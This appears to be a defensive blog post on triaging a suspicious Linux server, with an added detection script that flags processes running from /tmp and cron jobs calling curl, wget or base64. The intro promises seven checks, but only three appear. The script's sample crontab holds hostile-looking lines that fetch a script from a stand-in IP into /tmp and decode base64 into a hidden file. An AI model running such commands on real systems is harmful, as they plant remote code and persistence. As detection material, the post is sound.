
What I Check First When a Linux Server Starts Acting Suspicious

2 min read · May 21, 2025


✍️ Full Blog Content:

Intro:

Your server’s acting strange — maybe it’s lagging, maybe you’re seeing weird logs, or users are locked out. Before panic sets in, there’s a checklist I run through that helps me figure out what’s happening — fast. These are the first 7 things I check when a Linux server smells even a little bit wrong.

1. Who’s Logged In (Right Now)

who
w

✅ Look for:

  • Users logged in that shouldn’t be
  • Multiple logins from odd IPs
  • Sessions active at strange hours

2. What Processes Are Running

ps aux --sort=-%cpu | head

✅ Watch for:

  • Shells or binaries running from /tmp or /dev/shm
  • Long-running scripts
  • Unusual process names (misspelled system commands)

3. Any New Cron Jobs?

# Reading other users' crontabs needs root; quote the user name so odd entries cannot break the loop
for user in $(cut -f1 -d: /etc/passwd); do crontab -l -u "$user" 2>/dev/null; done
ls -l /etc/cron* /var/spool/cron

✅ Red flags:

  • Jobs calling curl, wget, or base64
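To turn checks 2 and 3 into something repeatable, here is an added example (not from the original post) that screens `ps aux` output and crontab listings for exactly the red flags listed above: executables running from /tmp or /dev/shm, and cron entries that call curl, wget or base64. The `ps` and crontab samples are constructed; the PIDs, paths and 203.0.113.10 address are made up.

```shell
#!/bin/sh
# Added example (not from the original post): screen `ps aux` output and
# crontab listings for the red flags in checks 2 and 3. Sample data below is
# constructed; paths, PIDs and addresses are made up.

# Constructed `ps aux` output: two processes started from /tmp and /dev/shm.
SAMPLE_PS=$(cat <<'EOF'
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 169000 11000 ?        Ss   May20   0:03 /sbin/init
www-data  1234  0.2  0.5 250000 40000 ?        S    May20   1:10 /usr/sbin/apache2 -k start
nobody    4242 97.0  0.3  90000 25000 ?        R    02:13 412:55 /tmp/.x/kswapd0
alice     5150  0.1  0.0  12000  2000 pts/1    S+   02:20   0:00 /dev/shm/.s/update.sh
alice     5151  0.0  0.0  10000  1500 pts/1    R+   02:21   0:00 ps aux --sort=-%cpu
EOF
)

# Constructed crontab: one curl job, one base64 job, one wget line commented out.
SAMPLE_CRON=$(cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://203.0.113.10/x.sh -o /tmp/.x.sh
# 0 4 * * * wget http://203.0.113.10/old.sh
@reboot echo aGVsbG8= | base64 -d >> /tmp/.log
EOF
)

# Check 2: print `ps aux` lines whose executable lives under /tmp or /dev/shm.
# Field 11 of `ps aux` is the first word of COMMAND; line 1 is the header.
flag_tmp_procs() {
    awk 'NR > 1 && ($11 ~ /^\/tmp\// || $11 ~ /^\/dev\/shm\//)'
}

# Check 3: print crontab lines calling curl, wget or base64; skip commented-out entries.
flag_cron_downloads() {
    grep -v '^[[:space:]]*#' | grep -Ew 'curl|wget|base64'
}

# Live variant of the post's loop (needs root): prefix each line with its owner.
flag_live_cron() {
    for user in $(cut -f1 -d: /etc/passwd); do
        crontab -l -u "$user" 2>/dev/null | sed "s/^/$user: /"
    done | flag_cron_downloads
}

echo "== processes from /tmp or /dev/shm =="
printf '%s\n' "$SAMPLE_PS" | flag_tmp_procs
echo "== cron jobs calling curl/wget/base64 =="
printf '%s\n' "$SAMPLE_CRON" | flag_cron_downloads
```

On a real box, pipe `ps aux` into `flag_tmp_procs` and run `flag_live_cron` as root; the commented-out wget entry is deliberately ignored so disabled jobs do not bury the live ones.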


Written by Faruk Ahmed

With 10+ years as an InfoSec Analyst, I excel in Symantec DLP, CrowdStrike, QRadar, Qualys, FireEye, Red Hat Linux, WebLogic, Python, and Bash. I am passionate.
